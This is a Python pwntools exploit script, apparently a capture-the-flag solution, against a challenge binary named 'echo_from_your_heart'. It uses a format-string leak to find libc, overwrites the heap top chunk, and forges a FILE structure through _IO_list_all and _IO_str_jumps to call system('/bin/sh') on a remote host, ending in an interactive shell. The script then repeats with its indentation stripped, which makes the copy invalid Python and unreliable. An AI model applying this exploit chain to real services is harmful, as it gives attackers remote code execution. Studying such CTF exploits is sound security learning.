Mech0n/echo_from_your_heart.py

## echo_from_your_heart.py
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./echo_from_your_heart')
p = remote('192.168.0.102', 1000)
libc = ELF('libc.so')

def debug(p, cmd):
    gdb.attach(p, cmd)
    pause()

def add(len, content):
    p.sendlineafter('lens of your word: ', str(len))
    p.sendlineafter('word: ', content)

def pack_file_64(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _mode = 0):
    struct = p64(_flags) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    struct = struct.ljust(0x88, "\x00")
    struct += p64(_lock)
    struct = struct.ljust(0xc0,"\x00")
    struct += p64(_mode)
    struct = struct.ljust(0xd8, "\x00")
    return struct

def LEAK():
    payload = 'b' * 0x10 + p64(0) + p64(0xfe1)
    add(0x10, payload)# 0xfe1
    # debug(p, 'b *0x400A1E\n')
    payload = '%d' * 7 + '#' + '%ld'
    add(0x1000, payload)
    p.recvuntil('#')
    libc_address = libc_addr = int(p.recvline()) - 241 - libc.symbols['__libc_start_main']
    success('LIBC: ' + str(hex(libc_address)))
    pause()

    payload = pack_file_64(
        _flags= 0,
        _IO_read_ptr= 0x61,
        _IO_read_base= libc_address + libc.symbols['_IO_list_all'] - 0x10,
        _IO_write_base= 2,
        _IO_write_ptr= 3,
        _IO_buf_base= libc_address + libc.search('/bin/sh\x00').next(),
        _mode= 0,
    )
    payload += p64(libc_address + libc.symbols['_IO_str_jumps'] - 8) + p64(0) + p64(libc_address + libc.symbols['system'])
    payload = 'b' * 0x10 + payload

    add(0x10, payload)
    p.sendlineafter('lens of your word:', str(0x18))
    p.interactive()

if __name__ == "__main__":
    LEAK()
	#! /usr/bin/python
	#-- coding: utf-8 --
	from pwn import *

	context.terminal = ['tmux', 'splitw', '-h']
	context(arch = 'amd64' , os = 'linux', log_level='debug')

	# p = process('./echo_from_your_heart')
	p = remote('192.168.0.102', 1000)
	libc = ELF('libc.so')

	def debug(p, cmd):
	gdb.attach(p, cmd)
	pause()

	def add(len, content):
	p.sendlineafter('lens of your word: ', str(len))
	p.sendlineafter('word: ', content)

	def pack_file_64(_flags = 0,
	_IO_read_ptr = 0,
	_IO_read_end = 0,
	_IO_read_base = 0,
	_IO_write_base = 0,
	_IO_write_ptr = 0,
	_IO_write_end = 0,
	_IO_buf_base = 0,
	_IO_buf_end = 0,
	_IO_save_base = 0,
	_IO_backup_base = 0,
	_IO_save_end = 0,
	_IO_marker = 0,
	_IO_chain = 0,
	_fileno = 0,
	_lock = 0,
	_mode = 0):
	struct = p64(_flags) + \
	p64(_IO_read_ptr) + \
	p64(_IO_read_end) + \
	p64(_IO_read_base) + \
	p64(_IO_write_base) + \
	p64(_IO_write_ptr) + \
	p64(_IO_write_end) + \
	p64(_IO_buf_base) + \
	p64(_IO_buf_end) + \
	p64(_IO_save_base) + \
	p64(_IO_backup_base) + \
	p64(_IO_save_end) + \
	p64(_IO_marker) + \
	p64(_IO_chain) + \
	p32(_fileno)
	struct = struct.ljust(0x88, "\x00")
	struct += p64(_lock)
	struct = struct.ljust(0xc0,"\x00")
	struct += p64(_mode)
	struct = struct.ljust(0xd8, "\x00")
	return struct

	def LEAK():
	payload = 'b' * 0x10 + p64(0) + p64(0xfe1)
	add(0x10, payload)# 0xfe1
	# debug(p, 'b *0x400A1E\n')
	payload = '%d' * 7 + '#' + '%ld'
	add(0x1000, payload)
	p.recvuntil('#')
	libc_address = libc_addr = int(p.recvline()) - 241 - libc.symbols['__libc_start_main']
	success('LIBC: ' + str(hex(libc_address)))
	pause()

	payload = pack_file_64(
	_flags= 0,
	_IO_read_ptr= 0x61,
	_IO_read_base= libc_address + libc.symbols['_IO_list_all'] - 0x10,
	_IO_write_base= 2,
	_IO_write_ptr= 3,
	_IO_buf_base= libc_address + libc.search('/bin/sh\x00').next(),
	_mode= 0,
	)
	payload += p64(libc_address + libc.symbols['_IO_str_jumps'] - 8) + p64(0) + p64(libc_address + libc.symbols['system'])
	payload = 'b' * 0x10 + payload

	add(0x10, payload)
	p.sendlineafter('lens of your word:', str(0x18))
	p.interactive()

	if __name__ == "__main__":
	LEAK()